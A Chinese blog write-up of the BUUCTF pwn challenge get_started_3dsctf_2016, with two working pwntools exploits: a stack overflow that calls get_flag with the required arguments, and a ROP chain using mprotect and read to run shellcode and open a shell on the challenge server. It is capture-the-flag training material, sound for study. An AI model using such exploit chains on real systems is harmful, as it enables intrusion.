buuctf|get_started_3dsctf_2016 1

已于 2022-05-01 22:34:59 修改
阅读量645 收藏 2
点赞数 2
文章标签: 安全
于 2022-05-01 22:31:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64236521/article/details/124533162
版权

方法一

我将文件下载后将其重命名为pwn_13,checksec一下
在这里插入图片描述
可以直接栈溢出,32位,进入ida
在这里插入图片描述
在这里插入图片描述
gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看
在这里插入图片描述

只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()
在这里插入图片描述
exp如下

from pwn import*
p=remote('node4.buuoj.cn',26832)
context.log_level='debug'
payload=b'a'*0x38+p32(0x80489A0)+p32(0x804E6A0)+p32(814536271)+p32(425138641)
p.sendline(payload)
p.recv()

这里context.log_level='debug’别删,不然看不到flag
在这里插入图片描述

方法二

ida中我们可以发现mprotext函数和read函数
mprotext函数用法如下

int mprotect(void *addr, size_t len, int prot);
addr 内存启始地址
len  修改内存的长度
prot 内存的权限

简单来说,就是以addr为起始地址将长度为len的内存权限修改为’prot‘。当prot值为7时,代表可读可写可执行。
这时候有了思路,我们可以用mprotext()使一段内存可读可写可执行,然后用read()将构造的shellcode放入这段内存中。
由于mprotext有三个参数,我们pop要用到三个寄存器,ROPgadget一下
在这里插入图片描述
这里我用的0x080509a5作为mprotext的返回地址
ida中ctrl+s一下,找个有读写权限的传入mprotext()
在这里插入图片描述

我用的是0x80EB000
有了思路就可以写exp了

from pwn import*
p=remote('node4.buuoj.cn',26832)

mprotext_addr=0x806ec80
pop3_addr=0x80509a5
buf=0x80EB000
read_addr=0x806E140
payload=b'a'*0x38+p32(mprotext_addr)+p32(pop3_addr)+p32(buf)+p32(0x1000)+p32(0x7)+p32(read_addr)+p32(buf)+p32(0)+p32(buf)+p32(0x200)
p.sendline(payload)
shellcode=asm(shellcraft.sh(),arch='i386',os='linux')
p.sendline(shellcode)

p.interactive()

在这里插入图片描述

嚚_瘖
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
get_started_3dsctf_2016
qq_45691294的博客
12-17 1334
先进入到题目环境里,程序接收用户输入,然后返回一串字符 checksec查看一下保护,只开启了NX,堆栈不可执行保护 用IDA分析程序,这一段程序很简短,gets函数存在溢出 发现了一个名为get_flag的函数 通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag 思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了 这里可以用本地调试判断偏移量
【CTF】get_started_3dsctf_2016
凉水的博客
01-19 613
解题思路: 1 先反编译,第一印象代码比较多、杂,找main函数找了半天才找到。 undefined4 main(void) { char local_38 [56]; printf("Qual a palavrinha magica? "); gets(local_38); return 0; } 2 看main函数,第一感觉是典型的栈溢出。然后就是ELF的一些保护。 Arch: i386-32-little RELRO: Partial RELRO Stack:
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1220
get_started_3dsctf_2016
get_started_complete_Windows编程_
10-02
在本文中,我们将深入探讨"get_started_complete"这个主题,特别是关于Windows编程的入门知识。Windows编程是开发针对Microsoft Windows操作系统应用的过程,它涉及到使用特定的API(应用程序接口)和其他工具来创建...
Python库 | get_version-3.5.4.tar.gz
03-07
本资源是一个名为"get_version-3.5.4.tar.gz"的压缩包,它包含了Python库"get_version"的3.5.4版本。这个库的主要作用是为Python项目提供一个简单的方法来获取软件的版本信息。 Python库"get_version"的设计目的是...
LinkIt_for_RTOS_Get_Started_Guide.pdf
06-23
LinkIt_for_RTOS_Get_Started_Guide.pdf
PyPI 官网下载 | get_fshare-1.0.3.tar.gz
02-01
当我们看到"PyPI 官网下载 | get_fshare-1.0.3.tar.gz"这样的标题时,可以理解为这是一个可以从PyPI官网获取的Python软件包,名为get_fshare,版本号为1.0.3,其压缩格式为tar.gz。 描述中提到的“资源全名:get_...
【Pwn】get_started_3dsctf_2016
ethan18的博客
07-20 214
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
ctf【get_started_3dsctf_2016
HUANGliang_的博客
10-29 176
ret2libc a1 == 0x308CD64F && a2 == 0x195719D1 get_flag函数地址0x80489A0 main函数地址0x8048A20
get_started_3dsctf_2016 1
qq_41560595的博客
03-18 754
又是被暴击的一天。 查看文件权限 可以栈溢出,地址写死了。 查看源程序 还是个静态文件,首先想到可以使用Gadget。 分析 存在一个mprotect函数: #include <unistd.h> #include <sys/mmap.h> int mprotect(const void *start, size_t len, int prot); mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot代表着 r-w-x
BUUCTF get_started_3dsctf_2016
红叶的博客
10-29 408
最后必须要返回exit,因为本题没有开启标准输入输出,输入输出会在缓冲区呆着,而exit执行后会将缓冲区输出,则可回显flag。需要 -0x04,因为是32位程序,并且返回地址要改成 get_flag 的地址。溢出 + get_flag地址 + exit + 2个判断条件。溢出 + get_flag地址 + 2个判断条件。但是这个思路还缺少一步。key,key1的地址。
buuctf get_started_3dsctf_2016 wp(python3)
Kata_Jhin的博客
03-14 127
buuctf get_started_3dsctf_2016 wp(python3)
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 455
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 3713
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
BUUCTF--get_started_3dsctf_20161
最新发布
qq_30528603的博客
01-12 460
题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。这题我本来以为是简单的ret2text.结果还是中了小坑。4.构造垃圾数据不用b‘a',打不通。这题还有一种解法,我是看别的师傅wp才知道的。
void USART2_IRQHandler(void) { /* USER CODE BEGIN USART2_IRQn 0 */ uint8_t ii; if(__HAL_UART_GET_FLAG(&huart2,UART_FLAG_IDLE) != RESET) { __HAL_UART_CLEAR_IDLEFLAG(&huart2); __HAL_UART_FLUSH_DRREGISTER(&huart2); //清除 IDLE中断 U2RxIdleCplt(); } if(__HAL_UART_GET_FLAG(&huart2, UART_FLAG_IDLE|UART_FLAG_PE | UART_FLAG_ORE | UART_FLAG_NE |UART_FLAG_FE) != RESET)//出错 { __HAL_UART_CLEAR_FLAG(&huart2, UART_FLAG_IDLE|UART_FLAG_PE | UART_FLAG_ORE | UART_FLAG_NE | UART_FLAG_FE);//串口异常处理:Overrun溢出等 //读SR后读DR清除ORE (清除方法是“先读SR寄存器,再读DR寄存器”,清除IDLE中断) ii = huart2.Instance->SR; ii = huart2.Instance->DR; ii++; } //清除标志位 __HAL_UART_CLEAR_IDLEFLAG(&huart2); /* USER CODE END USART2_IRQn 0 */ HAL_UART_IRQHandler(&huart2); /* USER CODE BEGIN USART2_IRQn 1 */帮我把这段代码改成标准库的代码
05-24
以下是使用标准库的代码: ``` void USART2_IRQHandler(void) { uint8_t ii; if(__HAL_UART_GET_FLAG(&huart2, UART_FLAG_IDLE) != RESET) { __HAL_UART_CLEAR_IDLEFLAG(&huart2); __HAL_UART_FLUSH_DRREGISTER(&huart2); U2RxIdleCplt(); } if(__HAL_UART_GET_FLAG(&huart2, UART_FLAG_IDLE | UART_FLAG_PE | UART_FLAG_ORE | UART_FLAG_NE | UART_FLAG_FE) != RESET) { __HAL_UART_CLEAR_FLAG(&huart2, UART_FLAG_IDLE | UART_FLAG_PE | UART_FLAG_ORE | UART_FLAG_NE | UART_FLAG_FE); ii = huart2.Instance->SR; ii = huart2.Instance->DR; ii++; } HAL_UART_IRQHandler(&huart2); } ``` 需要注意的是,这段代码的前提是你已经在 CubeMX 中将 USART2 的中断配置为 IDLE 中断,并且已经生成了对应的 HAL 库函数代码。如果你还没有进行这些操作,需要先进行配置和生成代码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值